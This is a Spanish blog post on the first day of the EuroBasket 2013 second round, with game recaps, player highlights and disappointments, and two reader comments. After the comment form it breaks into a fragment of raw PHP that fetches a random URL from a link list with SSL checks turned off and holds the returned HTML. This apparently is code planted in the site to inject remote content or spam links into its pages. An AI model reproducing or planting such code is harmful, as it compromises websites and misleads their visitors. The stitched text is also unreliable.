EuroNBAsket – 2ª Ronda – Jornada 1

13 de September de 2013 por txusma

Comenzábamos la segunda ronda un tanto descolocados ante la aplastante superioridad de Letonia ante Ukrania. Los segundos estuvieron sorprendentemente blandos, tanto en ataque como en defensa pero también hay que decir que los letones tuvieron el día soñado en el tiro con nada menos que un 15 de 29 en triples (51.7%) y 19 de 29 en canastas de dos (65.5%).  Después Bélgica se dejó buena parte de las opciones que le quedan con la previsible derrota ante Serbia. El choque fue más igualado de la cuenta y los balcánicos tiraron más de oficio que de buen juego. Para cerrar el grupo E Lituania no tuvo problemas para imponerse a una Francia que no encuentra su juego y presenta su candidatura al título.

En el grupo F, derrota de España ante Grecia. Hay quien hablará de lo mucho que reparten los griegos y lo poco que les pitan pero la verdad es que en el último cuarto no se pudo comparar la intensidad de uno y otro equipo. Antes, Croacia había destrozado a Finlandia y sigue con su racha triunfal ya que no pierde ningún partido desde el primer día y cada vez se les va más cómodos. Los que si vieron como se les acababa la racha fueron los italianos. Eslovenia les venció en un partido muy bonito gracias a su poderío en el rebote y a pesar del 10 del 21 que consiguieron los transalpinos desde la línea de 3.

DESTACADOS

Jonas Valanciunas: Terminó firmando un buen partido y los mejores números de los suyos. Muy acertado en lo poco que se prodigó, no falló ningún lanzamiento de campo y aprovechó bien sus minutos. 13 puntos, 6 rebotes, 1 tapón y 1 robo en tan sólo 16 minutos de juego. La otra lectura es que su impacto es engañoso, que su equipo no lo tiene precisamente como una referencia y que tampoco estuvo especialmente brillante en su defensa, sufriendo mucho ante Ajinça. 

Marc Gasol: España empieza y acaba en él. Cometió la tercera falta a los 8 minutos de partido y aún así pudo disputar 28 y acabar con 20 puntos y 5 rebotes.

Victor Claver: Sorprendente buen partido del jugador de los Blazers. Hubo momentos en los que fue él el que aguantó a la Selección. Acabó el partido con 9 puntos, 11 rebotes y 2 tapones.

Goran Dragic: Muy buen partido del jugador de los Suns. Se fue a los 22 puntos con buenos porcentajes y repartió 6 asistencias.

Bojan Bogdanovic: A lo suyo. 15 puntos y 5 rebotes más. Muy fino en el tiro de 2.

DECEPCIONES

Tony Parker: Se le vió apático e impotente. Sólo mostró su talento puntualmente e incluso sus compañeros parecieron verse más cómodos sin él en pista. 11 puntos, 2 rebotes, 1 asistencia que no están a su altura.

Nemanja Nedovic: Pésimo. Fue el peor titular de largo, sustituido por Kalinic en los minutos calientes y no debería extrañar que le termine ganando el puesto. 2 puntos, 4 rebotes, 2 asistencias y 1 robo pero 1 de 7 en tiros y 3 pérdidas.

Viacheslav Kravtsov: No fue titular pero tampoco mostró arrestos para recuperar su rol en un pésimo partido de los suyos. Intrascendente en la mediocridad. 16 minutos en pista, 6 rebotes y 7 tristes puntos.

Jose Calderon: Ha perdido el toque de los primeros partidos. Nos guste o no, no es escolta y no termina de encontrarse cómodo sin el balón en las manos. Anotó 5 puntos y repartió un par de asistencias.

Marco Belinelli: Terrible día de cara al aro. Anotó sólo 3 de los 15 tiros que intentó aunque aportó en otras facetas con 4 rebotes y 4 asistencias.

Donatas Motiejunas: 4 minutos en pista. Ese es su peso específico en su selección.

Comenta

2 comentarios a esta entrada

  1. rumbero dice:
    #1

    Excelente partido de los Dragic que acabaron por enterrar las esperanzas de los italianos. La verdad es que si estos tuvieran a un interior medio decente subirían enteros para hacer algo importante pero así dependen demasiado del día que tengan los exteriores. Ayer les hubiera venido bien hasta Bargnani para coger 4 o 5 rebotes.

    Y España que exceptuando el primer día contra Croacia ha perdido los dos partidos “complicados” hasta la fecha. No se la ve cómoda cuando se está decidiendo el vencedor. Excesiva dependencia de Marc (que si, sabemos que es muy bueno) pero es que se apagan totalmente las luces cuando no está en pista o le pegan más de la cuenta. Y eso que ayer salieron al rescate Rudy y ¡Claver! pero a la mejor defensa del torneo le metieron 27 puntos en el último cuarto. Spanoulis sembrando el pánico

      Citar

  2. jhc dice:
    #2

    valla varapalo el de España a jugarsela contra Italia y Finlandia

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>